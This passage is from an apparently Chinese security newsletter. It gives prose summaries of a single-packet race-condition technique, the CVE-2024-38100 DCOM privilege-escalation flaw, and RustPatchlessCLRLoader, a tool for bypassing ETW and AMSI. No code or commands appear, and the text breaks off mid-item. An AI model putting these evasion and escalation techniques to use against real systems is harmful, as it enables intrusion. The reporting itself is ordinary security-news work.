	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:单包搞条件竞争之类还是好使的</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">突破单包攻击限制：新技术实现166毫秒内发送10,000个请求</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsHIbeqfzqtmXKian2CLEIsBkVMGaHr0CLWbssNKCQiclprWgbyz3JvGmQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsHIbeqfzqtmXKian2CLEIsBkVMGaHr0CLWbssNKCQiclprWgbyz3JvGmQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844184558285458"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">单包跑赛攻击的原始形式对于需要大量同时请求的漏洞利用有限制，因为它只能发送大约1,500字节的请求。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">IP分片和TCP序列号重排可以扩展单包跑赛攻击的能力，允许发送超过65,535字节的数据，这超出了TCP的单个包大小限制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过这些技术，可以在短时间内发送大量请求，从而可能利用如一次性令牌认证的速率限制等严重漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">服务器的TCP缓冲区大小和HTTP/2的SETTINGS_MAX_CONCURRENT_STREAMS设置对于同时发送的请求数量有重要影响。</section></li></ul>
	<br/>
	<p>🏷️: 网络安全, 攻击技术, 单包攻击, 竞态条件</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 “假”土豆病毒的解析——解码器博客</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">该文章探讨了在分析“SilverPotato”滥用时，作者发现的一个与“ShellWindows” DCOM 应用程序相关的安全漏洞。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.9025641025641026" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="975" src="https://wechat2rss.xlab.app/img-proxy/?k=d16da346&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdspialbeOG60VJG390QcVBQDAfQ2CrsL0d30R1SZgELKV8SnvwcUvriaaw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.9384615384615385" data-w="975" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=1b3f9ff6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsnCs6zgjLqWTQpoCDmMQ8QNwEuF1Vr7eNbp8ccRO7mzywHGdIplaSxQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="1.4172077922077921" data-w="616" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e557a434&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsInrKnHia0yEvBhgyjL4RIrOJibkA23VMkiclfdUCqBGuBcaAEDgmkHr0Q%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-38100 漏洞分析：意外漏洞！</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">FakePotato 漏洞 (CVE-2024-38100) 分析文章发布</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdstl5yRO2FIRgvlwRgGInfmmmMW70qzbnABsydeuhibq3UOhZsqZLc2sw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdstl5yRO2FIRgvlwRgGInfmmmMW70qzbnABsydeuhibq3UOhZsqZLc2sw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855185228484482"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DCOM 应用程序“ShellWindows”可能被滥用以在本地标准用户会话中执行外部命令或应用程序。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在高完整性级别下，真正的管理员用户（UAC 禁用）可以访问这些权限，而普通用户则无法访问。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用 PowerShell 的 BindToMoniker() 调用，可以跨会话激活 DCOM 对象，并执行 ShellExecute() 方法，实现非特权用户向管理员用户发起攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">这一发现被确认为一个安全漏洞，并在 2024 年 7 月的 Patch Tuesday 中得到了修复（CVE-2024-38100）。</section></li></ul>
	<br/>
	<p>🏷️: DCOM, ShellWindows, SilverPotato, 网络安全, 攻击技术</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x09
			 利用RustPatchlessCLRLoader绕过Windows安全机制加载.NET程序集</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">RustPatchlessCLRLoader 是一个利用无需修补（patchless）技术的工具，用于绕过 Windows 事件跟踪（ETW）和反恶意软件扫描接口（AMSI），动态加载 .NET 程序集，以便在不修改系统文件和触发安全机制的情况下，隐蔽地执行托管代码。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6907407407407408" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=c0061f1c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsgytX8icnZqDzo0zSbyeRT9bsVK0TibKX8EKGU1OfUtlkMNuWABrwXYJw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.7537037037037037" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e8731a78&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxds5eGibprSw7iaQtbPemOPhmDavniaXjQc7Fibh9x2z6mfBnIDNocjia8miasA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdskibtkVSPlaO7oJMeVsP7Vfic42OrXuVJDRZV5jTWWkib6llCzrATa4kVg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdskibtkVSPlaO7oJMeVsP7Vfic42OrXuVJDRZV5jTWWkib6llCzrATa4kVg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844184125518548"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">无需修补技术的优势：RustPatchlessCLRLoader 利用硬件断点技术，能够在不修改系统文件和触发安全机制的情况下，绕过 ETW 和 AMSI，这种方法具有减少检测和避免文件完整性监控的优势。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">隐蔽执行托管代码：该工具的设计使得它能够隐秘地执行托管代码，特别是在安全性评估的环境中。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">支持有效载荷加密：RustPatchlessCLRLoader 